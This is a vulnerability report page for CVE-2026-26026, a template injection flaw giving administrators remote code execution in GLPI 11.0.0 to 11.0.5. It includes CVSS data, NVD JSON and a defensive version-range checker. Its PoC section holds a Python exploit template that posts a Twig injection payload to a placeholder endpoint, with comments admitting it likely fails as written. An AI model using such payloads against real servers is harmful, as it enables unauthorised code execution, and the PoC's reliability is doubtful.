Security Vulnerability Report
CVE-2026-26026 CVSS 9.1 CRITICAL

CVE-2026-26026

Published: 2026-04-06 15:17:07
Last Modified: 2026-04-07 16:03:35

Description

GLPI is a free asset and IT management software package. In versions from 11.0.0 up to but not including 11.0.6, a template injection reachable by an administrator leads to remote code execution on the server. This vulnerability is fixed in 11.0.6.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

The 9.1 CRITICAL score is the GitHub CNA's assessment with Scope: Changed. NVD's primary analysis rates the same metrics with Scope: Unchanged (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) as 7.2 HIGH; the only difference between the two is whether code execution inside GLPI is judged to affect components beyond the application itself. Either way, exploitation requires an authenticated administrator (PR:H). Weaknesses: CWE-94 (Improper Control of Generation of Code) and CWE-1336 (Improper Neutralization of Special Elements Used in a Template Engine).

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI >= 11.0.0, < 11.0.6
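A practitioner usually wants one answer from this section: "is my installed version inside the vulnerable range?" The following added example (not code from the report, NVD or GLPI) evaluates an NVD `cpeMatch` entry's version bounds against an installed version string. The `NVD_CONFIGURATIONS` value is a constructed copy of the configurations node from this report's raw JSON, trimmed to the fields the check uses; the product CPE prefix is a parameter with the GLPI prefix as its default. Pre-release suffixes are handled conservatively: `11.0.6-rc1` sorts before `11.0.6`, so a release candidate of the fixed version is still reported as affected.

```python
import json
import re

# Constructed copy of the NVD "configurations" node for CVE-2026-26026,
# reduced to the fields this check needs (values match the report above).
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*",
   "versionStartIncluding": "11.0.0",
   "versionEndExcluding": "11.0.6"}]}]}]
""")

# dotted numeric components, optionally followed by a pre-release tag such as
# "-rc1", ".beta2" or "alpha" (separator optional, trailing number optional)
_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:[-.]?([A-Za-z]+)(\d*))?")


def parse_version(version: str) -> tuple:
    """Turn '11.0.6', '11.0.6-rc1', ... into a tuple that compares correctly.

    Numeric components compare numerically (so 11.0.10 > 11.0.9). A release
    ends in the marker (1,); a pre-release ends in (0, tag, n), so it sorts
    below the release it precedes and pre-releases order alpha < beta < rc."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))  # pad '11.0' to '11.0.0'
    if m.group(2):
        return nums + (0, m.group(2).lower(), int(m.group(3) or 0))
    return nums + (1,)


def in_range(version: str, match: dict) -> bool:
    """Evaluate one cpeMatch entry's version bounds (any of the four NVD
    keys may be present) against an installed version."""
    v = parse_version(version)
    bounds = {
        "versionStartIncluding": lambda lo: v >= parse_version(lo),
        "versionStartExcluding": lambda lo: v > parse_version(lo),
        "versionEndIncluding": lambda hi: v <= parse_version(hi),
        "versionEndExcluding": lambda hi: v < parse_version(hi),
    }
    return all(check(match[key]) for key, check in bounds.items() if key in match)


def is_affected(version: str,
                product_cpe_prefix: str = "cpe:2.3:a:glpi-project:glpi:") -> bool:
    """True if the installed version matches a vulnerable cpeMatch entry for
    the product in any configuration node, honouring the node's operator."""
    for config in NVD_CONFIGURATIONS:
        for node in config["nodes"]:
            hits = [
                in_range(version, m)
                for m in node["cpeMatch"]
                if m.get("vulnerable") and m["criteria"].startswith(product_cpe_prefix)
            ]
            if not hits:
                continue
            matched = any(hits) if node.get("operator", "OR") == "OR" else all(hits)
            if node.get("negate"):
                matched = not matched
            if matched:
                return True
    return False


if __name__ == "__main__":
    for v in ("10.0.20", "11.0.0", "11.0.5", "11.0.6-rc1", "11.0.6", "11.1.0"):
        print(f"GLPI {v}: {'AFFECTED' if is_affected(v) else 'not affected'}")
```

The version string to feed in is whatever your inventory reports for the GLPI install (the same logic applies to any other NVD configuration node once its JSON is substituted for the constructed one).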

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-26026 (GLPI template injection)
# Target: GLPI >= 11.0.0, < 11.0.6
# Note: requires Administrator privileges. The login field names and the
# template endpoint below are placeholders and must be adjusted to the
# actual vulnerable path described in the vendor advisory before use.

target_url = "http://glpi-server.com"
login_url = f"{target_url}/login.php"

# 1. Authenticate as Admin (the response is not checked; inspect the
#    session cookies if the later request is answered with a login page)
session = requests.Session()
creds = {
    "login": "admin",
    "password": "admin_password",
    "auth": "local",
}
session.post(login_url, data=creds)

# 2. Prepare payload (Twig template expression)
# Intended to execute the 'id' command. Caveat: Twig's display() loads a
# template by name rather than running a shell command, and on Twig 2 and 3
# `_self` is the template name string, not the environment object, so this
# expression is a placeholder that at most shows the submitted string is
# evaluated as a template; substitute a payload that works against the Twig
# version the target ships.
payload = '{{_self.env.display("id")}}'

# 3. Send payload to the template endpoint
# Endpoint is hypothetical, adjust based on actual vulnerable path
exploit_url = f"{target_url}/ajax/template.php"
data = {"content": payload, "id": "1"}
response = session.post(exploit_url, data=data)

# 4. Check result
if response.status_code == 200:
    print("[+] Exploit sent successfully!")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Exploit failed")
```

References

https://github.com/glpi-project/glpi/security/advisories/GHSA-2c98-648q-h27h (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26026", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:07.093", "lastModified": "2026-04-07T16:03:34.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE. This vulnerability is fixed in 11.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "7BF95FA7-1F5E-4D44-B291-5576720FB714"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-2c98-648q-h27h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}